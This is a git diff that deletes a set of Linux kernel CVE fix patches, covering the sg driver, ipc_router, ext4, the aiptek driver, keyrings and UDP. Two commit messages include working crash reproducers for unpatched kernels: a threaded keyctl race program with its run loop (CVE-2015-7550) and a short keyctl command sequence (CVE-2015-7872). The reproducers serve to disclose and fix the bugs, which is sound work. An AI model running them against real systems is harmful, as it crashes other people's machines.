-diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c
-index b5a4db8..9d7b7db 100644
---- a/drivers/scsi/sg.c
-+++ b/drivers/scsi/sg.c
-@@ -1744,21 +1744,15 @@ sg_start_req(Sg_request *srp, unsigned char *cmd)
- md->from_user = 0;
- }
-
-- if (unlikely(iov_count > MAX_UIOVEC))
-- return -EINVAL;
--
- if (iov_count) {
-- int size = sizeof(struct iovec) * iov_count;
-- struct iovec *iov;
-+ struct iovec *iov = NULL;
- struct iov_iter i;
-
-- iov = memdup_user(hp->dxferp, size);
-- if (IS_ERR(iov))
-- return PTR_ERR(iov);
-+ res = import_iovec(rw, hp->dxferp, iov_count, 0, &iov, &i);
-+ if (res < 0)
-+ return res;
-
-- iov_iter_init(&i, rw, iov, iov_count,
-- min_t(size_t, hp->dxfer_len,
-- iov_length(iov, iov_count)));
-+ iov_iter_truncate(&i, hp->dxfer_len);
-
- res = blk_rq_map_user_iov(q, rq, md, &i, GFP_ATOMIC);
- kfree(iov);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-6619/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-6619/ANY/0001.patch
deleted file mode 100644
index 80074c66..00000000
--- a/Patches/Linux_CVEs/CVE-2015-6619/ANY/0001.patch
+++ /dev/null
@@ -1,5 +0,0 @@
-diff --git a/Image.gz-dtb b/Image.gz-dtb
-index afa7ae0..cc18024 100644
---- a/Image.gz-dtb
-+++ b/Image.gz-dtb
-Binary files differ
diff --git a/Patches/Linux_CVEs/CVE-2015-6619/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2015-6619/ANY/0001.patch.base64
deleted file mode 100644
index e4224e14..00000000
--- a/Patches/Linux_CVEs/CVE-2015-6619/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@ -ZGlmZiAtLWdpdCBhL0ltYWdlLmd6LWR0YiBiL0ltYWdlLmd6LWR0YgppbmRleCBhZmE3YWUwLi5jYzE4MDI0IDEwMDY0NAotLS0gYS9JbWFnZS5nei1kdGIKKysrIGIvSW1hZ2UuZ3otZHRiCkJpbmFyeSBmaWxlcyBkaWZmZXIK \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2015-6640/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-6640/ANY/0001.patch deleted file mode 100644 index 5c34a971..00000000 --- a/Patches/Linux_CVEs/CVE-2015-6640/ANY/0001.patch +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/kernel/sys.c b/kernel/sys.c -index f7e7a8b..800c5f2 100644 ---- a/kernel/sys.c -+++ b/kernel/sys.c -@@ -1934,7 +1934,7 @@ - tmp = end; - - /* Here vma->vm_start <= start < tmp <= (end|vma->vm_end). */ -- error = prctl_update_vma_anon_name(vma, &prev, start, end, -+ error = prctl_update_vma_anon_name(vma, &prev, start, tmp, - (const char __user *)arg); - if (error) - return error; diff --git a/Patches/Linux_CVEs/CVE-2015-6640/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2015-6640/ANY/0001.patch.base64 deleted file mode 100644 index 59cf86e6..00000000 --- a/Patches/Linux_CVEs/CVE-2015-6640/ANY/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2015-6642/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-6642/ANY/0001.patch deleted file mode 100644 index 5ac59d67..00000000 --- a/Patches/Linux_CVEs/CVE-2015-6642/ANY/0001.patch +++ /dev/null 
@@ -1,57 +0,0 @@
-From 4ad825ba2968666069740c3e80fe31ed3d0e29ba Mon Sep 17 00:00:00 2001
-From: Arun Kumar Neelakantam
-Date: Wed, 27 Jan 2016 18:46:01 +0530
-Subject: net: ipc_router: fix leak of kernel memory to userspace
-
-The service info structure is allocated with uninitialized memory for the
-max number of services and returns the complete structure to the usersapce
-resulting in the information leak if lookup operation finds less number of
-services than the requested number.
-
-Check the minimum of requested and available services and copy the minimum
-information to the user-space.
-
-CRs-Fixed: 965934
-Change-Id: Ic97f875855fdc6440c1db1d8d0338ee8b03a9d0a
-Signed-off-by: Arun Kumar Neelakantam
----
- net/ipc_router/ipc_router_socket.c | 17 +++++++++++------
- 1 file changed, 11 insertions(+), 6 deletions(-)
-
-diff --git a/net/ipc_router/ipc_router_socket.c b/net/ipc_router/ipc_router_socket.c
-index b127120..c26993c 100644
---- a/net/ipc_router/ipc_router_socket.c
-+++ b/net/ipc_router/ipc_router_socket.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -496,13 +496,18 @@ static int msm_ipc_router_ioctl(struct socket *sock,
-
- ret = copy_to_user((void *)arg, &server_arg,
- sizeof(server_arg));
-- if (srv_info_sz) {
-+
-+ n = min(server_arg.num_entries_found,
-+ server_arg.num_entries_in_array);
-+
-+ if (ret == 0 && n) {
- ret = copy_to_user((void *)(arg + sizeof(server_arg)),
-- srv_info, srv_info_sz);
-- if (ret)
-- ret = -EFAULT;
-- kfree(srv_info);
-+ srv_info, n * sizeof(*srv_info));
- }
-+
-+ if (ret)
-+ ret = -EFAULT;
-+ kfree(srv_info);
- break;
-
- case IPC_ROUTER_IOCTL_BIND_CONTROL_PORT:
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-7509/^3.7/0001.patch b/Patches/Linux_CVEs/CVE-2015-7509/^3.7/0001.patch
deleted file mode 100644
index 2aff5f4a..00000000
--- a/Patches/Linux_CVEs/CVE-2015-7509/^3.7/0001.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From c9b92530a723ac5ef8e352885a1862b18f31b2f5 Mon Sep 17 00:00:00 2001
-From: Anatol Pomozov
-Date: Tue, 18 Sep 2012 13:38:59 -0400
-Subject: ext4: make orphan functions be no-op in no-journal mode
-
-Instead of checking whether the handle is valid, we check if journal
-is enabled. This avoids taking the s_orphan_lock mutex in all cases
-when there is no journal in use, including the error paths where
-ext4_orphan_del() is called with a handle set to NULL.
-
-Signed-off-by: Anatol Pomozov
-Signed-off-by: "Theodore Ts'o"
----
- fs/ext4/namei.c | 7 +++----
- 1 file changed, 3 insertions(+), 4 deletions(-)
-
-diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
-index 37c03b3..8f4bda7 100644
---- a/fs/ext4/namei.c
-+++ b/fs/ext4/namei.c
-@@ -2369,7 +2369,7 @@ int ext4_orphan_add(handle_t *handle, struct inode *inode)
- struct ext4_iloc iloc;
- int err = 0, rc;
-
-- if (!ext4_handle_valid(handle))
-+ if (!EXT4_SB(sb)->s_journal)
- return 0;
-
- mutex_lock(&EXT4_SB(sb)->s_orphan_lock);
-@@ -2443,8 +2443,7 @@ int ext4_orphan_del(handle_t *handle, struct inode *inode)
- struct ext4_iloc iloc;
- int err = 0;
-
-- /* ext4_handle_valid() assumes a valid handle_t pointer */
-- if (handle && !ext4_handle_valid(handle))
-+ if (!EXT4_SB(inode->i_sb)->s_journal)
- return 0;
-
- mutex_lock(&EXT4_SB(inode->i_sb)->s_orphan_lock);
-@@ -2463,7 +2462,7 @@ int ext4_orphan_del(handle_t *handle, struct inode *inode)
- * transaction handle with which to update the orphan list on
- * disk, but we still need to remove the inode from the linked
- * list in memory. */
-- if (sbi->s_journal && !handle)
-+ if (!handle)
- goto out;
-
- err = ext4_reserve_inode_write(handle, inode, &iloc);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-7515/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2015-7515/3.2/0001.patch
deleted file mode 100644
index 070fe315..00000000
--- a/Patches/Linux_CVEs/CVE-2015-7515/3.2/0001.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 90eb3c037fe3f0f25f01713a92725a8daa2b41f3 Mon Sep 17 00:00:00 2001
-From: Vladis Dronov
-Date: Tue, 1 Dec 2015 13:09:17 -0800
-Subject: Input: aiptek - fix crash on detecting device without endpoints
-
-commit 8e20cf2bce122ce9262d6034ee5d5b76fbb92f96 upstream.
-
-The aiptek driver crashes in aiptek_probe() when a specially crafted USB
-device without endpoints is detected. This fix adds a check that the device
-has proper configuration expected by the driver. Also an error return value
-is changed to more matching one in one of the error paths.
-
-Reported-by: Ralf Spenneberg
-Signed-off-by: Vladis Dronov
-Signed-off-by: Dmitry Torokhov
-[bwh: Backported to 3.2: adjust context]
-Signed-off-by: Ben Hutchings
----
- drivers/input/tablet/aiptek.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/drivers/input/tablet/aiptek.c b/drivers/input/tablet/aiptek.c
-index 6d89fd1..5657018 100644
---- a/drivers/input/tablet/aiptek.c
-+++ b/drivers/input/tablet/aiptek.c
-@@ -1810,6 +1810,14 @@ aiptek_probe(struct usb_interface *intf, const struct usb_device_id *id)
- input_set_abs_params(inputdev, ABS_TILT_Y, AIPTEK_TILT_MIN, AIPTEK_TILT_MAX, 0, 0);
- input_set_abs_params(inputdev, ABS_WHEEL, AIPTEK_WHEEL_MIN, AIPTEK_WHEEL_MAX - 1, 0, 0);
-
-+ /* Verify that a device really has an endpoint */
-+ if (intf->altsetting[0].desc.bNumEndpoints < 1) {
-+ dev_err(&intf->dev,
-+ "interface has %d endpoints, but must have minimum 1\n",
-+ intf->altsetting[0].desc.bNumEndpoints);
-+ err = -EINVAL;
-+ goto fail3;
-+ }
- endpoint = &intf->altsetting[0].endpoint[0].desc;
-
- /* Go set up our URB, which is called when the tablet receives
-@@ -1852,6 +1860,7 @@ aiptek_probe(struct usb_interface *intf, const struct usb_device_id *id)
- if (i == ARRAY_SIZE(speeds)) {
- dev_info(&intf->dev,
- "Aiptek tried all speeds, no sane response\n");
-+ err = -EINVAL;
- goto fail2;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-7515/^4.4/0002.patch b/Patches/Linux_CVEs/CVE-2015-7515/^4.4/0002.patch
deleted file mode 100644
index 629f71b4..00000000
--- a/Patches/Linux_CVEs/CVE-2015-7515/^4.4/0002.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 8e20cf2bce122ce9262d6034ee5d5b76fbb92f96 Mon Sep 17 00:00:00 2001
-From: Vladis Dronov
-Date: Tue, 1 Dec 2015 13:09:17 -0800
-Subject: [PATCH] Input: aiptek - fix crash on detecting device without
- endpoints
-
-The aiptek driver crashes in aiptek_probe() when a specially crafted USB
-device without endpoints is detected. This fix adds a check that the device
-has proper configuration expected by the driver. Also an error return value
-is changed to more matching one in one of the error paths.
-
-Reported-by: Ralf Spenneberg
-Signed-off-by: Vladis Dronov
-Signed-off-by: Dmitry Torokhov
----
- drivers/input/tablet/aiptek.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/drivers/input/tablet/aiptek.c b/drivers/input/tablet/aiptek.c
-index e7f966da6efa3..78ca44840d60c 100644
---- a/drivers/input/tablet/aiptek.c
-+++ b/drivers/input/tablet/aiptek.c
-@@ -1819,6 +1819,14 @@ aiptek_probe(struct usb_interface *intf, const struct usb_device_id *id)
- input_set_abs_params(inputdev, ABS_TILT_Y, AIPTEK_TILT_MIN, AIPTEK_TILT_MAX, 0, 0);
- input_set_abs_params(inputdev, ABS_WHEEL, AIPTEK_WHEEL_MIN, AIPTEK_WHEEL_MAX - 1, 0, 0);
-
-+ /* Verify that a device really has an endpoint */
-+ if (intf->altsetting[0].desc.bNumEndpoints < 1) {
-+ dev_err(&intf->dev,
-+ "interface has %d endpoints, but must have minimum 1\n",
-+ intf->altsetting[0].desc.bNumEndpoints);
-+ err = -EINVAL;
-+ goto fail3;
-+ }
- endpoint = &intf->altsetting[0].endpoint[0].desc;
-
- /* Go set up our URB, which is called when the tablet receives
-@@ -1861,6 +1869,7 @@ aiptek_probe(struct usb_interface *intf, const struct usb_device_id *id)
- if (i == ARRAY_SIZE(speeds)) {
- dev_info(&intf->dev,
- "Aiptek tried all speeds, no sane response\n");
-+ err = -EINVAL;
- goto fail3;
- }
-
diff --git a/Patches/Linux_CVEs/CVE-2015-7550/^4.3/0001.patch b/Patches/Linux_CVEs/CVE-2015-7550/^4.3/0001.patch
deleted file mode 100644
index 4a7afa91..00000000
--- a/Patches/Linux_CVEs/CVE-2015-7550/^4.3/0001.patch
+++ /dev/null
@@ -1,112 +0,0 @@ -From b4a1b4f5047e4f54e194681125c74c0aa64d637d Mon Sep 17 00:00:00 2001 -From: David Howells -Date: Fri, 18 Dec 2015 01:34:26 +0000 -Subject: [PATCH] KEYS: Fix race between read and revoke - -This fixes CVE-2015-7550. - -There's a race between keyctl_read() and keyctl_revoke(). If the revoke -happens between keyctl_read() checking the validity of a key and the key's -semaphore being taken, then the key type read method will see a revoked key. - -This causes a problem for the user-defined key type because it assumes in -its read method that there will always be a payload in a non-revoked key -and doesn't check for a NULL pointer. - -Fix this by making keyctl_read() check the validity of a key after taking -semaphore instead of before. - -I think the bug was introduced with the original keyrings code. - -This was discovered by a multithreaded test program generated by syzkaller -(http://github.com/google/syzkaller). Here's a cleaned up version: - - #include - #include - #include - void *thr0(void *arg) - { - key_serial_t key = (unsigned long)arg; - keyctl_revoke(key); - return 0; - } - void *thr1(void *arg) - { - key_serial_t key = (unsigned long)arg; - char buffer[16]; - keyctl_read(key, buffer, 16); - return 0; - } - int main() - { - key_serial_t key = add_key("user", "%", "foo", 3, KEY_SPEC_USER_KEYRING); - pthread_t th[5]; - pthread_create(&th[0], 0, thr0, (void *)(unsigned long)key); - pthread_create(&th[1], 0, thr1, (void *)(unsigned long)key); - pthread_create(&th[2], 0, thr0, (void *)(unsigned long)key); - pthread_create(&th[3], 0, thr1, (void *)(unsigned long)key); - pthread_join(th[0], 0); - pthread_join(th[1], 0); - pthread_join(th[2], 0); - pthread_join(th[3], 0); - return 0; - } - -Build as: - - cc -o keyctl-race keyctl-race.c -lkeyutils -lpthread - -Run as: - - while keyctl-race; do :; done - -as it may need several iterations to crash the kernel. 
The crash can be -summarised as: - - BUG: unable to handle kernel NULL pointer dereference at 0000000000000010 - IP: [] user_read+0x56/0xa3 - ... - Call Trace: - [] keyctl_read_key+0xb6/0xd7 - [] SyS_keyctl+0x83/0xe0 - [] entry_SYSCALL_64_fastpath+0x12/0x6f - -Reported-by: Dmitry Vyukov -Signed-off-by: David Howells -Tested-by: Dmitry Vyukov -Cc: stable@vger.kernel.org -Signed-off-by: James Morris ---- - security/keys/keyctl.c | 18 +++++++++--------- - 1 file changed, 9 insertions(+), 9 deletions(-) - -diff --git a/security/keys/keyctl.c b/security/keys/keyctl.c -index fb111eafcb893..1c3872aeed14a 100644 ---- a/security/keys/keyctl.c -+++ b/security/keys/keyctl.c -@@ -751,16 +751,16 @@ long keyctl_read_key(key_serial_t keyid, char __user *buffer, size_t buflen) - - /* the key is probably readable - now try to read it */ - can_read_key: -- ret = key_validate(key); -- if (ret == 0) { -- ret = -EOPNOTSUPP; -- if (key->type->read) { -- /* read the data with the semaphore held (since we -- * might sleep) */ -- down_read(&key->sem); -+ ret = -EOPNOTSUPP; -+ if (key->type->read) { -+ /* Read the data with the semaphore held (since we might sleep) -+ * to protect against the key being updated or revoked. -+ */ -+ down_read(&key->sem); -+ ret = key_validate(key); -+ if (ret == 0) - ret = key->type->read(key, buffer, buflen); -- up_read(&key->sem); -- } -+ up_read(&key->sem); - } - - error2: diff --git a/Patches/Linux_CVEs/CVE-2015-7872/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-7872/ANY/0001.patch deleted file mode 100644 index 7fcac29f..00000000 --- a/Patches/Linux_CVEs/CVE-2015-7872/ANY/0001.patch +++ /dev/null 
@@ -1,79 +0,0 @@ -From f05819df10d7b09f6d1eb6f8534a8f68e5a4fe61 Mon Sep 17 00:00:00 2001 -From: David Howells -Date: Thu, 15 Oct 2015 17:21:37 +0100 -Subject: KEYS: Fix crash when attempt to garbage collect an uninstantiated - keyring - -The following sequence of commands: - - i=`keyctl add user a a @s` - keyctl request2 keyring foo bar @t - keyctl unlink $i @s - -tries to invoke an upcall to instantiate a keyring if one doesn't already -exist by that name within the user's keyring set. However, if the upcall -fails, the code sets keyring->type_data.reject_error to -ENOKEY or some -other error code. When the key is garbage collected, the key destroy -function is called unconditionally and keyring_destroy() uses list_empty() -on keyring->type_data.link - which is in a union with reject_error. -Subsequently, the kernel tries to unlink the keyring from the keyring names -list - which oopses like this: - - BUG: unable to handle kernel paging request at 00000000ffffff8a - IP: [] keyring_destroy+0x3d/0x88 - ... - Workqueue: events key_garbage_collector - ... - RIP: 0010:[] keyring_destroy+0x3d/0x88 - RSP: 0018:ffff88003e2f3d30 EFLAGS: 00010203 - RAX: 00000000ffffff82 RBX: ffff88003bf1a900 RCX: 0000000000000000 - RDX: 0000000000000000 RSI: 000000003bfc6901 RDI: ffffffff81a73a40 - RBP: ffff88003e2f3d38 R08: 0000000000000152 R09: 0000000000000000 - R10: ffff88003e2f3c18 R11: 000000000000865b R12: ffff88003bf1a900 - R13: 0000000000000000 R14: ffff88003bf1a908 R15: ffff88003e2f4000 - ... - CR2: 00000000ffffff8a CR3: 000000003e3ec000 CR4: 00000000000006f0 - ... - Call Trace: - [] key_gc_unused_keys.constprop.1+0x5d/0x10f - [] key_garbage_collector+0x1fa/0x351 - [] process_one_work+0x28e/0x547 - [] worker_thread+0x26e/0x361 - [] ? rescuer_thread+0x2a8/0x2a8 - [] kthread+0xf3/0xfb - [] ? kthread_create_on_node+0x1c2/0x1c2 - [] ret_from_fork+0x3f/0x70 - [] ? kthread_create_on_node+0x1c2/0x1c2 - -Note the value in RAX. This is a 32-bit representation of -ENOKEY. 
- -The solution is to only call ->destroy() if the key was successfully -instantiated. - -Reported-by: Dmitry Vyukov -Signed-off-by: David Howells -Tested-by: Dmitry Vyukov ---- - security/keys/gc.c | 6 ++++-- - 1 file changed, 4 insertions(+), 2 deletions(-) - -diff --git a/security/keys/gc.c b/security/keys/gc.c -index 39eac1f..addf060 100644 ---- a/security/keys/gc.c -+++ b/security/keys/gc.c -@@ -134,8 +134,10 @@ static noinline void key_gc_unused_keys(struct list_head *keys) - kdebug("- %u", key->serial); - key_check(key); - -- /* Throw away the key data */ -- if (key->type->destroy) -+ /* Throw away the key data if the key is instantiated */ -+ if (test_bit(KEY_FLAG_INSTANTIATED, &key->flags) && -+ !test_bit(KEY_FLAG_NEGATIVE, &key->flags) && -+ key->type->destroy) - key->type->destroy(key); - - security_key_free(key); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2015-8019/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2015-8019/3.10/0001.patch deleted file mode 100644 index 5dd1912b..00000000 --- a/Patches/Linux_CVEs/CVE-2015-8019/3.10/0001.patch +++ /dev/null 
@@ -1,99 +0,0 @@ -From 813658e0c448f2f5fb3301762076ba5e0f61411c Mon Sep 17 00:00:00 2001 -From: Eric Dumazet -Date: Wed, 30 Dec 2015 08:51:12 -0500 -Subject: udp: properly support MSG_PEEK with truncated buffers - -Backport of this upstream commit into stable kernels : -89c22d8c3b27 ("net: Fix skb csum races when peeking") -exposed a bug in udp stack vs MSG_PEEK support, when user provides -a buffer smaller than skb payload. - -In this case, -skb_copy_and_csum_datagram_iovec(skb, sizeof(struct udphdr), - msg->msg_iov); -returns -EFAULT. - -This bug does not happen in upstream kernels since Al Viro did a great -job to replace this into : -skb_copy_and_csum_datagram_msg(skb, sizeof(struct udphdr), msg); -This variant is safe vs short buffers. - -For the time being, instead reverting Herbert Xu patch and add back -skb->ip_summed invalid changes, simply store the result of -udp_lib_checksum_complete() so that we avoid computing the checksum a -second time, and avoid the problematic -skb_copy_and_csum_datagram_iovec() call. - -This patch can be applied on recent kernels as it avoids a double -checksumming, then backported to stable kernels as a bug fix. - -Signed-off-by: Eric Dumazet -Acked-by: Herbert Xu -Signed-off-by: David S. 
Miller -[d-cagle@codeaurora.org: Resolve trivial merge conflicts] -Git-repo: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git -Git-commit: 197c949e7798fbf28cfadc69d9ca0c2abbf93191 -Change-Id: I70f19a362f627bd2d9d8e10e31bbcdb4b0600792 -Signed-off-by: Dennis Cagle ---- - net/ipv4/udp.c | 6 ++++-- - net/ipv6/udp.c | 6 ++++-- - 2 files changed, 8 insertions(+), 4 deletions(-) - -diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c -index 463710f..23d991a 100644 ---- a/net/ipv4/udp.c -+++ b/net/ipv4/udp.c -@@ -1215,6 +1215,7 @@ int udp_recvmsg(struct kiocb *iocb, struct sock *sk, struct msghdr *msg, - int peeked, off = 0; - int err; - int is_udplite = IS_UDPLITE(sk); -+ bool checksum_valid = false; - bool slow; - - if (flags & MSG_ERRQUEUE) -@@ -1240,11 +1241,12 @@ try_again: - */ - - if (copied < ulen || UDP_SKB_CB(skb)->partial_cov) { -- if (udp_lib_checksum_complete(skb)) -+ checksum_valid = !udp_lib_checksum_complete(skb); -+ if (!checksum_valid) - goto csum_copy_err; - } - -- if (skb_csum_unnecessary(skb)) -+ if (checksum_valid || skb_csum_unnecessary(skb)) - err = skb_copy_datagram_iovec(skb, sizeof(struct udphdr), - msg->msg_iov, copied); - else { -diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c -index 2adb069..d689b25 100644 ---- a/net/ipv6/udp.c -+++ b/net/ipv6/udp.c -@@ -370,6 +370,7 @@ int udpv6_recvmsg(struct kiocb *iocb, struct sock *sk, - int peeked, off = 0; - int err; - int is_udplite = IS_UDPLITE(sk); -+ bool checksum_valid = false; - int is_udp4; - bool slow; - -@@ -401,11 +402,12 @@ try_again: - */ - - if (copied < ulen || UDP_SKB_CB(skb)->partial_cov) { -- if (udp_lib_checksum_complete(skb)) -+ checksum_valid = !udp_lib_checksum_complete(skb); -+ if (!checksum_valid) - goto csum_copy_err; - } - -- if (skb_csum_unnecessary(skb)) -+ if (checksum_valid || skb_csum_unnecessary(skb)) - err = skb_copy_datagram_iovec(skb, sizeof(struct udphdr), - msg->msg_iov, copied); - else { --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2015-8019/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2015-8019/3.18/0002.patch
deleted file mode 100644
index efb1aaf5..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8019/3.18/0002.patch
+++ /dev/null
@@ -1,99 +0,0 @@ -From f1c121b78e68c03f7fe5e9fa7319e53ad29392f3 Mon Sep 17 00:00:00 2001 -From: Eric Dumazet -Date: Wed, 30 Dec 2015 08:51:12 -0500 -Subject: udp: properly support MSG_PEEK with truncated buffers - -Backport of this upstream commit into stable kernels : -89c22d8c3b27 ("net: Fix skb csum races when peeking") -exposed a bug in udp stack vs MSG_PEEK support, when user provides -a buffer smaller than skb payload. - -In this case, -skb_copy_and_csum_datagram_iovec(skb, sizeof(struct udphdr), - msg->msg_iov); -returns -EFAULT. - -This bug does not happen in upstream kernels since Al Viro did a great -job to replace this into : -skb_copy_and_csum_datagram_msg(skb, sizeof(struct udphdr), msg); -This variant is safe vs short buffers. - -For the time being, instead reverting Herbert Xu patch and add back -skb->ip_summed invalid changes, simply store the result of -udp_lib_checksum_complete() so that we avoid computing the checksum a -second time, and avoid the problematic -skb_copy_and_csum_datagram_iovec() call. - -This patch can be applied on recent kernels as it avoids a double -checksumming, then backported to stable kernels as a bug fix. - -Signed-off-by: Eric Dumazet -Acked-by: Herbert Xu -Signed-off-by: David S. 
Miller -[d-cagle@codeaurora.org: Resolve trivial merge conflicts] -Git-repo: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git -Git-commit: 197c949e7798fbf28cfadc69d9ca0c2abbf93191 -Change-Id: I70f19a362f627bd2d9d8e10e31bbcdb4b0600792 -Signed-off-by: Dennis Cagle ---- - net/ipv4/udp.c | 6 ++++-- - net/ipv6/udp.c | 6 ++++-- - 2 files changed, 8 insertions(+), 4 deletions(-) - -diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c -index 44a7c83..9f8f9ae5 100644 ---- a/net/ipv4/udp.c -+++ b/net/ipv4/udp.c -@@ -1258,6 +1258,7 @@ int udp_recvmsg(struct kiocb *iocb, struct sock *sk, struct msghdr *msg, - int peeked, off = 0; - int err; - int is_udplite = IS_UDPLITE(sk); -+ bool checksum_valid = false; - bool slow; - - if (flags & MSG_ERRQUEUE) -@@ -1283,11 +1284,12 @@ try_again: - */ - - if (copied < ulen || UDP_SKB_CB(skb)->partial_cov) { -- if (udp_lib_checksum_complete(skb)) -+ checksum_valid = !udp_lib_checksum_complete(skb); -+ if (!checksum_valid) - goto csum_copy_err; - } - -- if (skb_csum_unnecessary(skb)) -+ if (checksum_valid || skb_csum_unnecessary(skb)) - err = skb_copy_datagram_iovec(skb, sizeof(struct udphdr), - msg->msg_iov, copied); - else { -diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c -index 9786416..c48441d 100644 ---- a/net/ipv6/udp.c -+++ b/net/ipv6/udp.c -@@ -388,6 +388,7 @@ int udpv6_recvmsg(struct kiocb *iocb, struct sock *sk, - int peeked, off = 0; - int err; - int is_udplite = IS_UDPLITE(sk); -+ bool checksum_valid = false; - int is_udp4; - bool slow; - -@@ -419,11 +420,12 @@ try_again: - */ - - if (copied < ulen || UDP_SKB_CB(skb)->partial_cov) { -- if (udp_lib_checksum_complete(skb)) -+ checksum_valid = !udp_lib_checksum_complete(skb); -+ if (!checksum_valid) - goto csum_copy_err; - } - -- if (skb_csum_unnecessary(skb)) -+ if (checksum_valid || skb_csum_unnecessary(skb)) - err = skb_copy_datagram_iovec(skb, sizeof(struct udphdr), - msg->msg_iov, copied); - else { --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2015-8019/4.3/0003.patch b/Patches/Linux_CVEs/CVE-2015-8019/4.3/0003.patch
deleted file mode 100644
index 1d12eaa4..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8019/4.3/0003.patch
+++ /dev/null
@@ -1,94 +0,0 @@ -From 197c949e7798fbf28cfadc69d9ca0c2abbf93191 Mon Sep 17 00:00:00 2001 -From: Eric Dumazet -Date: Wed, 30 Dec 2015 08:51:12 -0500 -Subject: udp: properly support MSG_PEEK with truncated buffers - -Backport of this upstream commit into stable kernels : -89c22d8c3b27 ("net: Fix skb csum races when peeking") -exposed a bug in udp stack vs MSG_PEEK support, when user provides -a buffer smaller than skb payload. - -In this case, -skb_copy_and_csum_datagram_iovec(skb, sizeof(struct udphdr), - msg->msg_iov); -returns -EFAULT. - -This bug does not happen in upstream kernels since Al Viro did a great -job to replace this into : -skb_copy_and_csum_datagram_msg(skb, sizeof(struct udphdr), msg); -This variant is safe vs short buffers. - -For the time being, instead reverting Herbert Xu patch and add back -skb->ip_summed invalid changes, simply store the result of -udp_lib_checksum_complete() so that we avoid computing the checksum a -second time, and avoid the problematic -skb_copy_and_csum_datagram_iovec() call. - -This patch can be applied on recent kernels as it avoids a double -checksumming, then backported to stable kernels as a bug fix. - -Signed-off-by: Eric Dumazet -Acked-by: Herbert Xu -Signed-off-by: David S. 
Miller ---- - net/ipv4/udp.c | 6 ++++-- - net/ipv6/udp.c | 6 ++++-- - 2 files changed, 8 insertions(+), 4 deletions(-) - -diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c -index 8841e98..ac14ae4 100644 ---- a/net/ipv4/udp.c -+++ b/net/ipv4/udp.c -@@ -1271,6 +1271,7 @@ int udp_recvmsg(struct sock *sk, struct msghdr *msg, size_t len, int noblock, - int peeked, off = 0; - int err; - int is_udplite = IS_UDPLITE(sk); -+ bool checksum_valid = false; - bool slow; - - if (flags & MSG_ERRQUEUE) -@@ -1296,11 +1297,12 @@ try_again: - */ - - if (copied < ulen || UDP_SKB_CB(skb)->partial_cov) { -- if (udp_lib_checksum_complete(skb)) -+ checksum_valid = !udp_lib_checksum_complete(skb); -+ if (!checksum_valid) - goto csum_copy_err; - } - -- if (skb_csum_unnecessary(skb)) -+ if (checksum_valid || skb_csum_unnecessary(skb)) - err = skb_copy_datagram_msg(skb, sizeof(struct udphdr), - msg, copied); - else { -diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c -index 9da3287..00775ee 100644 ---- a/net/ipv6/udp.c -+++ b/net/ipv6/udp.c -@@ -402,6 +402,7 @@ int udpv6_recvmsg(struct sock *sk, struct msghdr *msg, size_t len, - int peeked, off = 0; - int err; - int is_udplite = IS_UDPLITE(sk); -+ bool checksum_valid = false; - int is_udp4; - bool slow; - -@@ -433,11 +434,12 @@ try_again: - */ - - if (copied < ulen || UDP_SKB_CB(skb)->partial_cov) { -- if (udp_lib_checksum_complete(skb)) -+ checksum_valid = !udp_lib_checksum_complete(skb); -+ if (!checksum_valid) - goto csum_copy_err; - } - -- if (skb_csum_unnecessary(skb)) -+ if (checksum_valid || skb_csum_unnecessary(skb)) - err = skb_copy_datagram_msg(skb, sizeof(struct udphdr), - msg, copied); - else { --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2015-8539/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8539/ANY/0001.patch deleted file mode 100644 index f86c3c40..00000000 --- a/Patches/Linux_CVEs/CVE-2015-8539/ANY/0001.patch +++ /dev/null 
